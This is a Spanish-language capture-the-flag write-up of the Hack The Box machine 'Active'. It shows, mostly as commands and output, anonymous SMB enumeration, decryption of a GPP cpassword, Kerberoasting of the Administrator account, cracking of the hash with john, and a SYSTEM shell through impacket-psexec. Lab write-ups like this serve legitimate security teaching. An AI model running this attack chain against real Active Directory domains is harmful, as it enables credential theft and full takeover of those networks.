Active
8 minutos de lectura
Hack The Box. Windows. Máquina fácil. Esta máquina presenta un entorno de Active Directory (AD) para realizar enumeración de SMB, descrifrado de contraseñas y Kerberoasting. Para comprometer la máquina se necesitan conocer técnicas básicas de enumeración y explotación de AD
- SO: Windows
- Dificultad: Fácil
- Dirección IP: 10.10.10.100
- Fecha: 28 / 07 / 2018
Escaneo de puertos
# Nmap 7.92 scan initiated as: nmap -sC -sV -o nmap/targeted 10.10.10.100 -p 53,88,135,139,389,445,464,593,636,3268,3269,5722,9389,47001,49152,49153,49154,49155,49157,49158,49169,49171,49182
Nmap scan report for 10.10.10.100
Host is up (0.10s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: )
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49169/tcp open msrpc Microsoft Windows RPC
49171/tcp open msrpc Microsoft Windows RPC
49182/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 12m57s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date:
|_ start_date:
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done -- 1 IP address (1 host up) scanned in 71.22 seconds
La máquina tiene abiertos los puertos 53 (DNS), 88 (Kerberos), 135 (MS-RPC), 389 (LDAP) y 445 (SMB), entre otros.
$ crackmapexec smb 10.10.10.100
SMB 10.10.10.100 445 DC [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
Además, vemos que la máquina es un controlador de dominio (DC) de un entorno de Active Directory (AD). Podemos empezar añadiendo active.htb en /etc/hosts.
Enumeración
Utilizando smbmap y una sesión anónima, podemos enumerar los recursos compartidos por SMB:
$ smbmap -H 10.10.10.100 -u '' -p '' --no-banner
[+] IP: 10.10.10.100:445 Name: 10.10.10.100 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
Como se puede ver, tenemos acceso a un recurso llamado Replication. Podemos descargar todos los archivos utilizando smbclient como sigue:
$ smbclient \\\\10.10.10.100\\Replication -N
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
active.htb D 0 Sat Jul 21 06:37:44 2018
10459647 blocks of size 4096. 5725771 blocks available
smb: \> cd active.htb
smb: \active.htb\> recurse ON
smb: \active.htb\> prompt OFF
smb: \active.htb\> mget *
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI of size 22 as Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\GPE.INI of size 119 as Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy/GPE.INI (0.3 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2788 as Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol (7.7 KiloBytes/sec) (average 2.0 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml (1.4 KiloBytes/sec) (average 1.9 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 1098 as Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (3.0 KiloBytes/sec) (average 2.1 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 3722 as Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (10.4 KiloBytes/sec) (average 3.2 KiloBytes/sec)
Y ahora tenemos estos archivos en local:
$ tree active.htb
active.htb
├── DfsrPrivate
│ ├── ConflictAndDeleted
│ ├── Deleted
│ └── Installing
├── Policies
│ ├── {31B2F340-016D-11D2-945F-00C04FB984F9}
│ │ ├── GPT.INI
│ │ ├── Group Policy
│ │ │ └── GPE.INI
│ │ ├── MACHINE
│ │ │ ├── Microsoft
│ │ │ │ └── Windows NT
│ │ │ │ └── SecEdit
│ │ │ │ └── GptTmpl.inf
│ │ │ ├── Preferences
│ │ │ │ └── Groups
│ │ │ │ └── Groups.xml
│ │ │ └── Registry.pol
│ │ └── USER
│ └── {6AC1786C-016F-11D2-945F-00C04fB984F9}
│ ├── GPT.INI
│ ├── MACHINE
│ │ └── Microsoft
│ │ └── Windows NT
│ │ └── SecEdit
│ │ └── GptTmpl.inf
│ └── USER
└── scripts
21 directories, 7 files
Descifrando una contraseña en Groups.xml
Existe un archivo llamado Groups.xml. Este archivo se utiliza para configurar las políticas del dominio. El archivo es el siguiente:
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
<User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
<Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS" />
</User>
</Groups>
Existe un usuario llamado SVC_TGS. La contraseña del usuario está cifrada en una propiedad llamada cpassword. Afortunadamente, la contraseña se puede descifrar porque Microsoft publicó la clave de cifrado para el algoritmo (más información aquí). El proceso de descifrado se realiza con gpp-decrypt:
$ gpp-decrypt 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ'
GPPstillStandingStrong2k18
Ahora podemos verificar con crackmapexec si las credenciales son válidas:
$ crackmapexec smb 10.10.10.100 -u SVC_TGS -p GPPstillStandingStrong2k18
SMB 10.10.10.100 445 DC [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.10.10.100 445 DC [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18
Más enumeración por SMB
Ahora que tenemos credenciales válidas, podemos ver si tenemos más permisos en SMB:
$ smbmap -H 10.10.10.100 -u SVC_TGS -p GPPstillStandingStrong2k18 --no-banner
[+] IP: 10.10.10.100:445 Name: 10.10.10.100 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
Replication READ ONLY
SYSVOL READ ONLY Logon server share
Users READ ONLY
Podemos leer archivo del recursos Users, veamos si podemos encontrar la flag user.txt dentro:
$ smbclient \\\\10.10.10.100\\Users -U SVC_TGS
Enter WORKGROUP\SVC_TGS's password:
Try "help" to get a list of possible commands.
smb: \> dir
. DR 0 Sat Jul 21 10:39:20 2018
.. DR 0 Sat Jul 21 10:39:20 2018
Administrator D 0 Mon Jul 16 06:14:21 2018
All Users DHSrn 0 Tue Jul 14 01:06:44 2009
Default DHR 0 Tue Jul 14 02:38:21 2009
Default User DHSrn 0 Tue Jul 14 01:06:44 2009
desktop.ini AHS 174 Tue Jul 14 00:57:55 2009
Public DR 0 Tue Jul 14 00:57:55 2009
SVC_TGS D 0 Sat Jul 21 11:16:32 2018
10459647 blocks of size 4096. 5725627 blocks available
smb: \> cd SVC_TGS
smb: \SVC_TGS\> dir
. D 0 Sat Jul 21 11:16:32 2018
.. D 0 Sat Jul 21 11:16:32 2018
Contacts D 0 Sat Jul 21 11:14:11 2018
Desktop D 0 Sat Jul 21 11:14:42 2018
Downloads D 0 Sat Jul 21 11:14:23 2018
Favorites D 0 Sat Jul 21 11:14:44 2018
Links D 0 Sat Jul 21 11:14:57 2018
My Documents D 0 Sat Jul 21 11:15:03 2018
My Music D 0 Sat Jul 21 11:15:32 2018
My Pictures D 0 Sat Jul 21 11:15:43 2018
My Videos D 0 Sat Jul 21 11:15:53 2018
Saved Games D 0 Sat Jul 21 11:16:12 2018
Searches D 0 Sat Jul 21 11:16:24 2018
10459647 blocks of size 4096. 5725627 blocks available
smb: \SVC_TGS\> cd Desktop
smb: \SVC_TGS\Desktop\> dir
. D 0 Sat Jul 21 11:14:42 2018
.. D 0 Sat Jul 21 11:14:42 2018
user.txt A 34 Sat Jul 21 11:06:25 2018
10459647 blocks of size 4096. 5725627 blocks available
smb: \SVC_TGS\Desktop\> get user.txt
getting file \SVC_TGS\Desktop\user.txt of size 34 as user.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
Y aquí la tenemos:
$ cat user.txt
86d67d8ba232bb6a254aa4d10159e983
Escalada de privilegios
Además, con un nombre de usuario válido podemos realizar un ataque AS-REP Roasting. Pero si además tenemos credenciales válidas, podemos realizar un ataque de Kerberoasting.
Ataque de Kerberoasting
Este ataque consiste en requerir el Ticket Granting Service (TGS) de un usuario determinado y romper el hash de manera offline para conseguir la contraseña (si esta es débil).
Para configurar el ataque, primero tenemos que sincronizarnos con el DC (con rdate o ntpdate):
# rdate -n 10.10.10.100
Y entonces podemos comprobar si hay algún usuario “kerberoasteable”:
$ impacket-GetUserSPNs -dc-ip 10.10.10.100 active.htb/SVC_TGS:GPPstillStandingStrong2k18
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 21:06:40.351723 2022-11-10 00:50:33.067749
El usuario Administrator es “kerberoasteable”. Ahora podemos solicitar su TGS:
$ impacket-GetUserSPNs -dc-ip 10.10.10.100 -request-user Administrator active.htb/SVC_TGS:GPPstillStandingStrong2k18
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 21:06:40.351723 2022-11-10 00:50:33.067749
[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$04bbe44c152d9356071dc6ca96daa99f$d7c946916bf61962ae661e5e2a99909122fac984887454c4afb0fdb65a2473a24f6b4923d8cc4873f942ddea5da8bd2ca95dbb5beaa96531a79b6ea09e72949c48120b593d199f00cb37cce172a141ddefa901283b58d8a26975747809e9676b146877921f303a671fef2aaa819c4fa31eb0d21af6dc647066da2281c39f20514bea280f91b2867d950d984e0c29ca5f2552eccc5661e142d64c9cce6a8ae92ba1f3f26bb98e0ccbd44b1198f248c8fbffde28001d73f622ae3d68986334564e8cc97e5f9ba1995af6f5ebdfa1ab9562f2dbd86f64a2a3c1c131864669d5d5297280e000660d35993f0551c9d0a37fac9ce805ebedd9797502c59313f3ea3ccce3267d6da67ecac4ee55f7e366ac7a3bd5791c3d3a72d29d31bf39320621c6afe4cf848450fe1a73569b441ddc14c6c1593139ee7c8f9525afdfcf717e9cf03af5222222708d42b3c38e1590d5eb87fab7d7575441593488e0881e4a9911c4709e224891a24f0c6e7435b67b19a41bb5c0ceea0eb859f98b2dcf301598545f25c3fef637d268b1aec6fdd60c9e7bdbdd215b5a28e72a4a567ad50ef808aff5df5cd703edeed35565ee07cfbb5869b8528c3a8a430d0ef403aa50db8c83ca3ed89c2f4473c29c1a57b3c1f80b343c99043eef2f628e564be5ac045c5dd2a2e2781fb1cbe58e68b3b011aa0516bb3fa695a3f148df89c685ba3e8d9ff32f3b577975ad024a50d518cfd3e83414e20375d4b081b4e119bf1ebce02f147b933eeef5ac2fd2f4c92a48582f51bebc53381ef4842d461912aba8792bab3108e1fcfbf8227c4c45f3257c01892e45d65f35633b2b8342096e0e5c4941cd891199db82c746c9431011f06b971b10d59933e2bc3b64c3b5856c7bdf9895de351051894cc0dd435a125a88116f8fdf875f87608909dfe26480694b734402b3754ff92b7fe6cbf872061d40a00767919eae0614b5aea3d942c961d6079c5bc4a7cbf55621e8ecc898b30035299c11f9e47b7da1bbe0e75a82c31c805df94c4e57aae06ba80d4406090887a743dea590de3fc42a7d30516207befb321b581c599e5a4aad05f577220261d9a4549aa0b247cd81dff938193429debcb0bf4379d8bcb097a13c6b9942f1abedc623ed072e64d4e879a349c9e8ac85376668f579079cdfb756b944d5f9712b0ff66b3fa6f667e2be7b557e3a40873f45741c1ab4a6aaec29cd3b6b0eb270c649b47acf9b222f5ce7a201d8ce2938dd2908a0fcca89
Mediante john y rockyou.txt, podemos tratar de romper el hash:
$ echo '$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$04bbe44c152d9356071dc6ca96daa99f$d7c946916bf61962ae661e5e2a99909122fac984887454c4afb0fdb65a2473a24f6b4923d8cc4873f942ddea5da8bd2ca95dbb5beaa96531a79b6ea09e72949c48120b593d199f00cb37cce172a141ddefa901283b58d8a26975747809e9676b146877921f303a671fef2aaa819c4fa31eb0d21af6dc647066da2281c39f20514bea280f91b2867d950d984e0c29ca5f2552eccc5661e142d64c9cce6a8ae92ba1f3f26bb98e0ccbd44b1198f248c8fbffde28001d73f622ae3d68986334564e8cc97e5f9ba1995af6f5ebdfa1ab9562f2dbd86f64a2a3c1c131864669d5d5297280e000660d35993f0551c9d0a37fac9ce805ebedd9797502c59313f3ea3ccce3267d6da67ecac4ee55f7e366ac7a3bd5791c3d3a72d29d31bf39320621c6afe4cf848450fe1a73569b441ddc14c6c1593139ee7c8f9525afdfcf717e9cf03af5222222708d42b3c38e1590d5eb87fab7d7575441593488e0881e4a9911c4709e224891a24f0c6e7435b67b19a41bb5c0ceea0eb859f98b2dcf301598545f25c3fef637d268b1aec6fdd60c9e7bdbdd215b5a28e72a4a567ad50ef808aff5df5cd703edeed35565ee07cfbb5869b8528c3a8a430d0ef403aa50db8c83ca3ed89c2f4473c29c1a57b3c1f80b343c99043eef2f628e564be5ac045c5dd2a2e2781fb1cbe58e68b3b011aa0516bb3fa695a3f148df89c685ba3e8d9ff32f3b577975ad024a50d518cfd3e83414e20375d4b081b4e119bf1ebce02f147b933eeef5ac2fd2f4c92a48582f51bebc53381ef4842d461912aba8792bab3108e1fcfbf8227c4c45f3257c01892e45d65f35633b2b8342096e0e5c4941cd891199db82c746c9431011f06b971b10d59933e2bc3b64c3b5856c7bdf9895de351051894cc0dd435a125a88116f8fdf875f87608909dfe26480694b734402b3754ff92b7fe6cbf872061d40a00767919eae0614b5aea3d942c961d6079c5bc4a7cbf55621e8ecc898b30035299c11f9e47b7da1bbe0e75a82c31c805df94c4e57aae06ba80d4406090887a743dea590de3fc42a7d30516207befb321b581c599e5a4aad05f577220261d9a4549aa0b247cd81dff938193429debcb0bf4379d8bcb097a13c6b9942f1abedc623ed072e64d4e879a349c9e8ac85376668f579079cdfb756b944d5f9712b0ff66b3fa6f667e2be7b557e3a40873f45741c1ab4a6aaec29cd3b6b0eb270c649b47acf9b222f5ce7a201d8ce2938dd2908a0fcca89' > hash
$ john --wordlist=$WORDLISTS/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Ticketmaster1968 (?)
1g 0:00:00:10 DONE 0.09718g/s 1024Kp/s 1024Kc/s 1024KC/s Tiffani1432..Thrash1
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Como vemos, la contraseña es débil y entonces tenemos acceso como Administrator. Para entrar a la máquina, podemos emplear impacket-psexec y ver la flag root.txt:
$ impacket-psexec active.htb/Administrator:Ticketmaster1968@10.10.10.100
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file UBsxELyA.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service WvVb on 10.10.10.100.....
[*] Starting service WvVb.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt
87ad1f1ec59362d0537d15ce706b3229